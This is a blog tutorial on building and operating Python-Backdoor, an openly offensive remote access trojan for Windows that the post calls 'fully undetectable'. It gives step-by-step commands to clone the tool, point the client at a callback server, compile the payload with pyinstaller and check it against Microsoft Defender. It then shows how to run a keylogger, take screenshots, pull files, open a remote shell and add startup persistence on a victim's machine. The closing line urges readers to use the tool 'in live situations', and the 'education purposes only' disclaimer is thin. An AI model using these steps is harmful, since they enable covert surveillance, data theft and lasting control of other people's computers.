Get the latest news and tutorials on open source to improve yourself as a hacker.

Post Top Ad

Operating Systems

Hacker

Post Top Ad

Introduction


Python-Backdoor is a fully undetectable backdoor written entirely in Python with the main purpose of  contributing to the cybersecurity field. Rich in features, although it's server can be operated from the whole range of well known operating systems, it targets the Windows machine.

Having tested this cyber weapon on my own lab, I came to the conclusion that such tool is worth being shared with anyone who is passionate about computer security, or penetration testing.

Features

  • Multi-client support
  • Cross-platform server
  • Builtin-keylogger
  • Ability to send command to all clients
  • Ability to capture screenshots
  • Ability to upload/download files
  • Ability to send messages
  • Ability to run at startup
  • Ability to browse files
  • Ability to dump user info
  • Ability to open remote cmd
  • Ability to open remote python interpreter
  • Ability to disable task manager
  • Ability to shutdown/restart/lock pc
  • Ability to melt file on startup

How to setup the Python-Backdoor on your own lab

According to the official documentation shared on the author's Github page, Python-Backdoor requires Python 3.6 or Python 3.7. As for the building of the client, a Windows box is required.

Download the project from the official repository

Run the following command to download the source code for the Python-Backdoor.
git clone https://github.com/xp4xbox/Python-Backdoor.git

Create a virtual environment and install the requirements

Before installing all the python packages required by the project, it is required that you create a fresh virtual environment inside the project's root directory.
cd Python-Backdoor
virtualenv -p /usr/local/bin/python3.7 env
Once you have managed to create the virtual environment install the requirements with the following command.
source env/bin/activate # activate the virtual environment
pip install -r requirements.txt

Setup the victim machine

As for the victim machine, I am going to setup a Windows 10 operating system on my Virtualbox. Not only I am going to infect it, but I am also going to use it for building the client.

Make sure to have Python 3.7 or 3.8 installed on the target machine.

Generate the virus

Once you have managed to download the Python-Backdoor on your Windows machine, make sure to navigate to it and run the following command to install the requirements.
pip install -r requirements.txt
Then edit the following line with the server's IP address on client.py so the virus connects to the server.
strHost = "127.0.0.1"


Then run the following command to finally generate the executable virus.
pyinstaller client.py --exclude-module FixTk --exclude-module tcl --exclude-module tk --exclude-module _tkinter --exclude-module tkinter --exclude-module Tkinter --onefile --windowed


If everything goes fine, you can easily locate the client under the subdirectory dist of the project.

Scan the virus client

It is always a good idea to scan the client with the whole antiviruses available on the target machine; for the purpose of this tutorial I am scanning the fresh client with Microsoft Defender.

Start the server

Before running the client on the target machine, it is required that you start the server. The following command can help to do that.
python server.py # make sure to be inside the project, server side

Run the client on the target

Once you have managed to launch the server on the host machine, go on the target machine and run the client as a normal program.

If everything goes fine, you should get a connection on the server side like shown below.

Interact with the connection

To interact with the connection type the following command.
--i 0 # 0 is the id of the session

Get information on the user

Getting information on the user running the target machine can be achieved with the help of the following command.
--u

Take a screenshot on the target

Taking a screenshot on the victim machine is as easy as typing the following command on the server side.
--p

Start a keylogger on the target machine

To start a keylogger on the victim's machine, just type the following command.
--k start
When you're done, dump the logged data with the following command.
--k dump
The logged data is going to be printed out on the console.

Send a message to the user

The Python-Backdoor offers the option to troll with the victim. Such option is shown in the following command.
--m Hello from space

Download files from the target machine

To download files from the target machine, type the following command.
--r
Then provide the full path of the file you want to download.

Open a remote Python interpreter

It is also possible to run a Python interpreter on the remote machine. The following command can help you to do that.
--i 

Open a remote command prompt

To open a remote shell, type the following command.
--e

Add the rat to startup

Such feature is extremely useful as it automatically triggers a connection back to the server each time the user restarts the target machine.
--a 1

Restart the user

The command to restart the user is being shown below.
--x 2 

Conclusion

Having covered the most important and useful features offered by the Python-Backdoor, it is up to you to further explore and see its abilities in live situations. Being fluent in Python, I find this cyber weapon truly easy to setup and operate.

Disclaimer: Education purposes only.

Copyright hackermilk.info

No comments:

Post a Comment

Post Top Ad